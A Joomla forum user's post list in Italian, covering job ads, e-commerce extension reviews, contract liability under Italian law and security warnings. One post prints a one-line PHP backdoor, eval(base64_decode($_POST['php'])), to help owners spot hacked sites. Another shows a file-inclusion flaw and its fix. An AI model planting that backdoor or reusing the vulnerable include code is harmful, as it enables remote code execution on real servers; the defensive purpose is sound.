Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.


Topics - mmleoni

Pagine: [1]
1
2f Communication srl ricerca, nell'ambito del potenziamento del comparto tecnico, il seguente profilo:

Web Designer

Occupazione:
realizzazione, aggiornamento e gestione di siti internet.

Requisiti:
  • Esperienza nello sviluppo di grafica per il web;
  • Conoscenza di programmi di grafica (Photoshop, Illustrator, etc);
  • Conoscenza delle dinamiche di creazione di template web;
  • Ottima conoscenza del linguaggio HTML 5, CSS 2/3;
  • Conoscenza delle problematiche cross-browser;
  • Esperienza nell'uso di CMS (Joomla 2.5+ / Word Press 3+): personalizzazione template e moduli, trouble shooting;
Costituiscono titolo preferenziale:
  • Buona conoscenza della lingua inglese;
  • Conoscenza Javascript (JQuery, Mootools);
  • Conoscenze SEO SEM. (SEO, Web Reputation Tools, Google Analytics, Google Adwords, Facebook ADV, Web Content Editor e Social Media Marketing)
Si richiede CV accompagnato da portfolio.

La sede di lavoro è Milano (Loreto), contratto a tempo determinato con durata di mesi sei, eventualmente prorogabili, impegno part time o full time.


informazioni di contatto :

rife: Leoni Marco Maria
jcv@2fcommunication.com
(inviare il CV accompagnato da portfolio, con autorizzazione al trattamento dei dati al fine della selezione del personale, al succitato indirizzo email)


2FCommunication srl
Sede Legale: Via del Pratellino, 14/b - 50131 – Firenze - n. REA 474877 FIRENZE
Sede Operativa: Viale Monza, 12 - 20127 - Milano - n. REA 1663228 MILANO



2
Joomla! 3 / J3 e geshi
« il: 07 Lug 2014, 09:41:18 »
accidenti a loro, mi hanno rimosso geshi da j3  >:(


qualcuno mi consiglia un plugin sostitutivo, magari compatibile con la vecchia sintassi?


grazie,
marco


3
Gestione e-commerce / Virtuemart 2.1 per Joomla! 3
« il: 15 Gen 2014, 09:13:00 »
ieri Milbo, che è il Projectleader di VM ha annunciato il rilascio della versione 2.1 della piattaforma:

http://forum.virtuemart.net/index.php?topic=119177.msg414652#msg414652

questa release introduce la compatibilità per J3.x, ma non è ancora da usare nei siti di produzione, probabilmente bisognerà aspettare la versione 2.2.

piano, piano, ma qualcosa si muove...

ciao,
marco


4
Questo è un forum dedicato a Joomla! e non a disquisizioni legali, siamo tutti d'accordo, ma ho troppe volte visto persone che, senza alcuna competenza specifica, si lanciano nella realizzazione di siti e-commerce senza conoscere minimamente le responsabilità che si assumono.

Nota: non ci occuperemo di contratti e quindi non chiedeteli/proponeteli in questo topic/forum che hanno altro scopo.

Senza pretesa di affrontare una trattazione esaustiva, voglio solo richiamare l'attenzione sulla responsabilità che ci si assume quando si accetta un tale incarico a fronte del pagamento di un corrispettivo, dando così origine ad un contratto tra le parti.
Ricordo che il codice civile non prevede necessariamente la forma scritta per il contratto, ma il fatto che si sia realizzato il sito è sufficiente a far presupporre l'esistenza del contratto (comportamento concludente).


Tornando all'oggetto, la responsabilità contrattuale è la responsabilità che deriva dall'inadempimento, dall'inesatto adempimento o dall'adempimento tardivo della  obbligazione derivante dal contratto stipulato (Art. 1173 Fonti delle obbligazioni: "Le obbligazioni derivano da contratto ...").

Ho parlato di inesatto adempimento, perché è assolutamente necessario che chi assume l'obbligazione debba adempiere alla stessa, non al meglio delle proprie capacità, ma secondo gli standard professionali necessari all'adempimento della obbligazione in questione.

Mi spiego meglio: "non lo sapevo" e "ho fatto quel che ho potuto" NON sono scusanti. Ma vediamo più nel dettaglio.


Art. 1176 Diligenza nell’adempimento
"Nell’adempiere l’obbligazione il debitore deve usare la diligenza del buon padre di famiglia (...). Nell’adempimento delle obbligazioni inerenti all’esercizio di un’attività professionale la diligenza deve valutarsi con riguardo alla natura dell’attività esercitata (...)."

Che uno debba svolgere l'attività che si è impegnato a compiere con serietà ed impegno è cosa su cui, spero, siamo tutti d'accordo. E questo è quanto richiede la legge con il primo capoverso dell'articolo citato.

Ma il secondo capoverso ci dice che la normale "diligenza del buon padre di famiglia" non è più considerata sufficiente se l'obbligazione è da adempiersi nell'abito dell'esercizio della propria attività professionale. Questo è il caso in cui una persona dichiarandosi informatico/esperto di e-commerce/webmaster, o anche solo facendo intendere di esserlo, assuma l'impegno di realizzare un sito (sia o no e-commerce) a fronte di un compenso.

L'obbligato che ha un comportamento negligente sarà sicuramente colpevole dell'eventuale inadempimento, ma altrettanto colpevole lo sarà anche in caso di inesatto adempimento, ovvero quando il lavoro non è svolto con la professionalità richiesta dall'attività svolta.
Tenete presente che in caso di giudizio la qualità del lavoro viene fatta determinare dal giudice tramite un perito iscritto al tribunale, quindi da una persona che ha anni di esperienza nel settore.


La colpa e la responsabilità contrattuale, Art. 1218 Responsabilità del debitore:
"Il debitore che non esegue esattamente (...) la prestazione dovuta è tenuto al risarcimento del danno (...), se non prova (...) che l’inadempimento o il ritardo è stato determinato da impossibilità della prestazione derivante da causa a lui non imputabile (…)."

Molte volte ho sentito dire "devono provare che ho/hai sbagliato": no! è vero l'esatto contrario.
Nella responsabilità contrattuale, il legislatore presume la colpa del debitore, esonerando la controparte dall'onere probatorio. Il debitore per liberarsi da ogni responsabilità deve provare l’assenza di colpa, ovvero che il mancato/inadeguato adempimento dipenda da causa a lui non imputabile.

Se non vi riesce di dimostrare quanto sopra, ed è difficile se il lavoro è pieno di macroscopici difetti (errori nell'html, nel php, nelle queries) e manchevole delle basilari norme di programmazione sicura, dovrete risarcire i danni subiti dalla controparte.



Esclusione di responsabilità
Altro argomento gettonato è: "faccio firmare un contratto in cui dico che non ho responsabilità", seguito da un elenco più o meno fantasioso di clausole di limitazione della responsabilità, di cui alcune davvero carine (ironico, ovviamente).

È sicuramente vero che il legislatore ha stabilito che debitore e creditore possono accordarsi per determinare aggravi o attenuazioni della diligenza richiesta dall'obbligazione, ma ha anche stabilito che "è nullo qualsiasi patto che esclude o limita preventivamente la responsabilità del debitore per dolo o per colpa grave" (Art. 1229).
La mancanza delle competenze professionali richieste dall'esecuzione del contratto non solo è colpa grave, ma, secondo la mia opinione, è anche violazione al principio di buona fede secondo il quale deve essere eseguito il contratto (Art. 1375 "Il contratto deve essere eseguito secondo buona fede (1337,1358,1366, 1460)").




Spero di avere fatto un poco di chiarezza su quelle che sono le responsabilità di sviluppa o mantiene  un sito web a fronte del pagamento di un corrispettivo, ovvero svolgendo attività professionale.

Come detto la trattazione non ha pretesa di né di completezza né di accuratezza assoluta (qualche "taglio" lo ho messo), ma vuole solo introdurre uno spunto di riflessione prima di lanciarsi in qualcosa che non si sa proprio fare.
Se qualche avvocato vede qualcosa da correggere non si faccia scrupoli a segnalarmelo, grazie.

Buon lavoro a tutti,
marco


5
Gestione e-commerce / le soluzioni e-commerce per Joomla!
« il: 19 Dic 2013, 15:00:08 »
Visto il succedersi degli eventi e la crescente confusione generata da aggiornamenti e mancati aggiornamenti, ho pensato di indicare velocemente le soluzioni di e-commerce che conosco/uso, free almeno nella versione base, più diffuse per joomla.

Ovviamente sentitevi liberi di proporre altre soluzioni, il contributo di tutti è sempre gradito in un forum, purchè:
  • siano per joomla 2.5 e 3.x
  • Open source e GPL
  • abbiano almeno una versione free (pienamente utilizzabile)
  • scriviate almeno una breve recensione (senza copiare la descrizione ;) )
Questo topic vuole fare chiarezza nel mondo joomla soprattutto per chi inizia, quindi vi invito a mantenerlo "pulito" non effettuando interventi fuori tema o polemici.


Joomla e-commerce?
Per prima cosa un chiarimento è d'obbiglo: Joomla!, WordPress, Drupal, Typo3 (e così via) sono cms che, con alcune estensioni, possono anche funzionare come sistemi e-commerce, per questo motivo sono, di norma, meno performanti e meno adattabili/configurabili dei sistemi e-commerce puri, che sono da preferire ove l'esigenza di commercio sia primaria e molto articolata.

Scegliere l'una o scegliere l'altra soluzione dipende dai bisogni che dovete soddisfare, quindi, come sempre, è necessaria un'accurata analisi della situazione prima di effettuare una scelta e non si può dare una risposta a priori. vi dirò che in alcuni casi, ove servivano le caratteristiche dei due mondi, si è scelta una doppia installazione (www .sito.tld per il cms, shop.sito.tld per l'e-commerce) quindi, come vedete, le scelte possibili sono molte.

Che cosa c'è di disponibile per Joomla!


** JoomShopping - compatibilità: J1.5, J2.5, J3.x
http://extensions.joomla.org/extensions/e-commerce/shopping-cart/5378

JoomShopping è un ecommerce semplice, più limitato rispetto a Virtuemart, ma decisamente semplice da usare e funzionale.
La principale limitazione è l'incapacità di gestire gli stock in presenza di varianti di prodotto, mentre una caratteristisca decisamente utile è la possibilità di identificare gli utenti come aziende o privati, il che permette di applicare velocemente le regole IVA della comunità europea.

Gli aggiornamenti di JoomShopping sono frequenti ed il prodotto dà l'idea di essere ben seguito, anche se il sistema di aggiornamento è al di fuori del framework di Joomla, il che avrebbe reso più semplice il controllo degli aggiornamenti. Anche il codice non rispetta pienamente gli standard proposti da Joomla ma è ben pensato e ben scritto. Aggiungo che la versione per Joomla! 3.x è disponibile da circa un anno.

Il supporto e la documentazione sono gli aspetti più critici: Il furum non ha una comunità molto attiva e parte dello stesso è in tedesco. La documentazione è a livello di VM2... c'è da dire che il sistema è semplice ed intuitivo da usare e quindi si risolve rapidamente, eventualmente con il forum.

Il parco accessori non è molto vasto, ma Joomshopping fa già quello deve, quindi al più dovrete implementare qualche gateway bancario. Vi sono comunque alcuni moduli aggiuntivi dal costo di poche decine di euro. Sono disponibili templates già pronti, anche per la versione 4, ovvero per Joomla 3.x, quindi adatti anche ai dispositivi mobile.




** HikaShop - compatibilità: J1.5, J2.5, J3.x
http://extensions.joomla.org/extensions/e-commerce/shopping-cart/14275

HikaShop potrebbe diventare il nuovo standard di riferimento nel mondo Joomla. Come prima cosa diciamo che solo la versione base è gratuita e buona parte delle opzioni più "professionali" si trovano nelle versioni a pagamento; una curiosa eccezione è "chiedi informazioni sul prodotto" che esiste solo nelle versioni commerciali (ma si può fare in altri modi).

Il sito è molto ben fatto e molto chiaro, vi è una tabella comparativa che illustra chiaramente le caratteristiche supportate dalle varie versioni free e a pagamento. I costi non sono sicuramente proibitivi, a fronte delle caratteristiche offerte, ma, prima del passaggio dalla versione free a quella commerciale, vi consiglio di valutare il già citato JoomShopping.

Il forum è in inglese, con qualche area localizzata, ma l'italiano, al solito, non c'è. È ben seguito, come di regola per i prodotti con alle spalle un modello commerciale.

Il punto di forza è sicuramente la documentazione per lo sviluppatore, ogni elemento (prodotti, categorie, carrello, spedizioni) prevede eventi per la gestione tramite plugin, e tutti gli eventi sono documentati. Analoga situazione per la personalizzazione grafica.
Scrivere integrazioni/modifiche diviene così molto facile, ma soprattutto il codice rimane facile da manutenere, dato che tale approccio consente di non modificare il codice base preservando la possibilità di effettuare eventuali aggiornamenti.

È, imho, la soluzione da prediligere per gli sviluppatori, che debbano implementare caratteristiche non comuni, pur non volendo ricorrere a soluzioni dedicate all'e-commerce. Per tutti gli altri consiglio di provare la soluzione base.


** VirtueMart 2 - compatibilità: J1.5, J2.5

Non si può parlare comunque di e-commerce per Joomla senza citare VM. Purtroppo bisogna dire che quello che per J1.x era il punto di riferimento ora è più che altro un 'work in progress' e non è ancora compatibile con J3.x.

VM2 risente di diversi bugs/aree incompiute, che lo rendono difficile da usare e configurare.

La versione due è una quasi totale riscrittura del codice e quindi non basatevi su ciò che sapevate possibile/avete visto fare con la versione uno: non è assolutamente detto che sia la stessa cosa. Un esempio per tutti: non sono più supportati i prodotti digitali (i downloads quali pdf, mp3 et cetera) per i quali è necessario un plugin aggiuntivo a pagamento.

VM2 ha molti margini di miglioramento, ma lo sviluppo è rimasto indietro rispetto alla tabella di marcia, quindi vi consiglio di sceglierlo come piattaforma di sviluppo solo qualora abbiate valutato che nessuna delle altre piattaforme possa rispondere alle vostre esigenze ed abbiate competenze  come sviluppatori (ambiti jQuery, PHP, MySQL).



** SimpleCaddy - compatibilità: J2.5

Non si tratta di un vero sistema e-commerce, e lo cito solo perchè qualcuno usa soluzioni come questa e di tanto in tanto se ne parla sul forum.

In realtà si tratta di un'estensione di com_content che permette di usare gli articoli di Joomla come fossero prodotti, esistono soluzioni analoghe anche per K2.

Questi prodotti sono da ritenersi soluzioni entry level da usare solo ove le necessità da risolvere, più che basilari, siano da considerarsi banali; io non ne consiglio mai l'adozione.

Più che questi prodotti, poi assolutamente difficili da modificare/adattare, vi consiglierei il bottone 'acquista ora' di paypal, inserito direttamente nella pagina o tramite l'uso di un plug-in.





A questo punto non mi resta che augurare buon lavoro a tutti!  :) :)

ciao,
marco

6
SEO / meta robots nel menù di J2.5.16
« il: 14 Nov 2013, 21:04:06 »
ciao!
mi sono accorto di una cosa: il meta robots impostabile nel menù non funziona se l'impostazione di default del sito è "index, follow". "index, follow" non viene inserito (è una stringa vuota nell'XML della form) e fin qui bene, tanto è inutile.

però il fatto che non sia inserito fa sì che lo specificare un comportamento diverso per le voci di menù venga ignorato. l'impostazione funziona se si parte da una configurazione generale differente, ma la cosa mi sembra leggermente folle! la logica, in un sito normale, è che sia tutto indicizzabile, tranne le parti inutili (ad esempio le form di contatto).

per il momento ho risolto con due righe di codice nel template, ma anche cercando sul web mi pare che altri abbiano notato la cosa.

voi confermate il problema?

ciao,
marco
 


7
Sicurezza / Ho ripristinato il sito, e adesso?
« il: 01 Nov 2013, 14:05:13 »
Una volta ripristinato il sito e buona cosa adoperarsi perché la spiacevole esperienza non si ripeta, quindi vi consiglio MOLTO caldamente di  leggere con attenzione quanto qui indicato:

http://www.joomla.it/notizie/6983-la-vera-sicurezza-per-il-tuo-sito-joomla-e-il-tuo-atteggiamento.html

leggere e mettere in pratica quanto scritto, ovviamente.

A volte ritornano? No tornano di sicuro se non li bloccate!
La sicurezza è importante e va curata continuamente, se no vi rivedremo, disperati, in questa sezione...

ciao a tutti,
marco

8
il modulo in oggetto è stato rimosso dal jed ed è sotto investigazione per aver inserito dei link a siti 'sospetti' ad insaputa degli utenti.

il problema non riguarda nivo slider ma solo questa implementazione.

consiglio la rimozione e la sostituzione con altro slider. ulteriori info su:
http://forum.joomla.it/index.php/topic,179348.msg883946.html#msg883946

ciao a tutti,
marco

9
Sicurezza / mai installare l'ultima versione (php 5.3.7)
« il: 31 Ago 2011, 09:46:42 »
qui un interessante articolo che spiega perchè gli amministratori di sistema non installano MAI l' ultima versione appena uscita:

http://www.theregister.co.uk/2011/08/22/php_security_warning/


credetemi: non è l'unico caso...  >:(

ciao,
marco


10
2FCommunication srl sta cercando una persona abile nella gestione di Joomla! per tenere corsi presso i propri clienti.
La figura richiesta dovrà avere una buona conoscenza della piattaforma Joomla! 1.5 (gestione pacchetti virtuemart e joomfish, news, photogallery).

La prima sede di lavoro sarà Monza (MB).

informazioni di contatto:
rife: Leoni Marco Maria
curricula@2fcommunication.com

2FCommunication srl
Sede Legale: Via del Pratellino, 14/b - 50131 – Firenze - n. REA 474877 FIRENZE
Sede Operativa: Viale Monza, 12 - 20127 - Milano - n. REA 1663228 MILANO

ciao a tutti
marco

11
Sviluppo / ACL J1.6 per table access
« il: 22 Gen 2011, 09:32:05 »
ciao qualcuno ha capito come si impostano le ACL di j1.6 per l'accesso ad una specifica sezione di un componente (tabella/controller/model)?

faccio un esempio: il componente per gestire i banner di joomla; più sezioni, una gestisce le categorie, l'altra i banner, et cetera.
ho trovato la documentazione su come impostare le ACL per l'accesso al componente e per l'accesso alle singole righe delle tabelle categorie e banner, ma come si imposta l'accesso all'intera tabella? In altri termini voglio un gruppo di utenti che possa accedere a tutto ed uno che possa accedere solo ai banner, a quest'ultimo sarà perciò precluso l'accesso al menù di gestione delle categorie.

ciao,
marco

12
2FCommunication srl sta cercando un programmatore php junior part-time.
La figura richiesta dovrà avere una  buona conoscenza della piattaforma Joomla! 1.5 (installazione, messa in sicurezza, installazione e gestione pacchetti virtuemart e joomfish) e della programmazione php/mysql.
Sono elementi graditi la conoscenza di JavaScript/CSS, sistemi linux/windows (servers) e linguaggi .NET.

La sede di lavoro è Milano (Loreto)

informazioni di contatto:
rife: Leoni Marco Maria
curricula@2fcommunication.com

2FCommunication srl
Sede Legale: Via del Pratellino, 14/b - 50131 – Firenze - n. REA 474877 FIRENZE
Sede Operativa: Viale Monza, 12 - 20127 - Milano - n. REA 1663228 MILANO

ps: il colloquio sarà sostenuto con me, quindi se mi conoscete sapete che vi aspetta  ;D

ciao a tutti
marco

13
Sicurezza / Protezione da SQL injection e LFI
« il: 31 Mag 2010, 21:43:54 »
ciao,
  dato che bugSearch.net mi ha fatto venire l'angoscia ho scritto un plugin per proteggere il sito dai vari attacchi citati:

http://extensions.joomla.org/extensions/access-a-security/site-security/12731

questo plugin intercetta le richieste inviate a joomla e blocca i principali attacchi SQL injection e LFI (local file inclusion) impedendo che arrivino al componente vulnerabile.

Domande e spiegazioni in coda a questo post, non sul mio sito (tutto ciò che va al mio sito si presume a pagamento  ;D )

ciao a tutti,
marco



14
stavo verificando un po' dei logs dei vari server che gestisco e mi è saltato all'occhio un incremento esponenziale degli attacchi a questo componente.

la versione citata, oltre a problemi di SQL injection, soffriva anche di una vulnerabilità agli attacchi di tipo LFI (local file inclusion), dovuta ad una non accorta scrittura dell'entry point del front end:

Codice: [Seleziona]
if($controller = JRequest::getVar('controller')) {
require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}

corretta poi in:

Codice: [Seleziona]
if($controller = JRequest::getCmd('controller')) {
require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}

nella 1.3.4.

mentre il risultato di un attacco di tipo SQL injection è tipicamente il defacement del sito, il risultato di un LFI può arrivare facilmente all'impossessarsi dell'intero server.

è per altro vero che sia necessario che il server non sia configurato a regola d'arte, ma è ormai certo che ci siano in giro un sacco di dilettanti che si spacciano per sysadmins.


comunque: aggiornare immediatamente a 1.3.4.

ciao,
marco






15
è disponibile per il download la versione 1.5.16 localizzata in italiano.
sono altresì disponibili i pacchetti di aggiornamento dalle varie versioni precedenti.

consiglio a tutti di provvedere all'aggiornamento, dato che vi sono anche diversi security fixes.

un grazie ai traduttori per l'impegno e la velocità!!

ciao a tutti,
marco

16
E subito dopo tonicopi arriva la legnata  ;D

eccovi una bella spiegazione tecnica del mondo linux, da leggere se vi siete chiesti che mai significhi 777 ...

link: http://www.joomla.it/articoli-della-community/4200-i-permessi-linux-e-lhosting.html

spero non sia troppo un mattone.

ciao,
marco

17
ciao a tutti,
  sto realizzando un e-commerce in cui un link deve essere 'le nostre marche' ovvero l'elenco dei marchi trattati dal negozio e con la possibilità di visualizzare tutti i prodotti di uno specifico marchio.

sbaglio o non esiste una tale possibilità? parlo dell'installazione base di virtuemart, perché a realizzarlo ho impiegato 20 minuti, ma mi sembra strano che non ci sia...

ciao,
marco

18
Sicurezza / eval (base64_decode($_POST["php"])) ATTENZIONE
« il: 25 Mar 2010, 20:29:07 »
Avviso ai naviganti:
ho visto diversi post più o meno simili, e quindi se vi trovate uno strano file di pochi bites, che sostanzialmente contiene solo:

<?php
eval (base64_decode($_POST["php"]));
?>


sappiate che il vostro sito è stato vittima di un hack, ovvero qualcuno è riuscito ad entrare ed ha lasciato questo file per poter agevomente mandare in esecuzione un codice php arbitrario sul vostro sito.

questo file può assumere vari nomi (pop, post, google, mailcheck) e trovarsi in una o più directories, root compresa.

quando avete un attimo di tempo provate a verificare i files *.php, almeno controllate le date.

questo file deve essere cancellato, non basta sovrascrivere l'installazione altrimenti il sito resterà soggetto ad hacks.

ciao,
marco


19
Questo articolo spiega le basi del funzionamento del mod_rewrite usato da joomla per le funzioni SEO.
Non ha la pretesa di insegnare, ma illustra alcuni esempi comuni in ambito Joomla! spiegandone dettagliatamente, e spero chiaramente ;) , il funzionamento.

Un'avvertenza l'artico è abbastanza 'tosto', nel senso che è un discreto mattone ;D


Link: http://www.joomla.it/articoli-della-community/4040-modificare-gli-url-in-htaccess-con-le-funzioni-di-modrewrite.html

ciao,
marco


20
Una domanda frequente, sia nel forum relativo all'installazione e migrazione, sia in quello relativo al SEO, riguarda come spostare Joomla! da una sottodirectory alla root del sito, soprattutto, come fare ciò preservando il posizionamento già raggiunto nei motori di ricerca.

In questo articolo vediamo come si fa:

Link: http://www.joomla.it/articoli-della-community/4036-spostare-joomla-da-una-sottodirectory-alla-root-preservando-il-posizionamento.html

ciao a tutti,
marco

Pagine: [1]

Torna su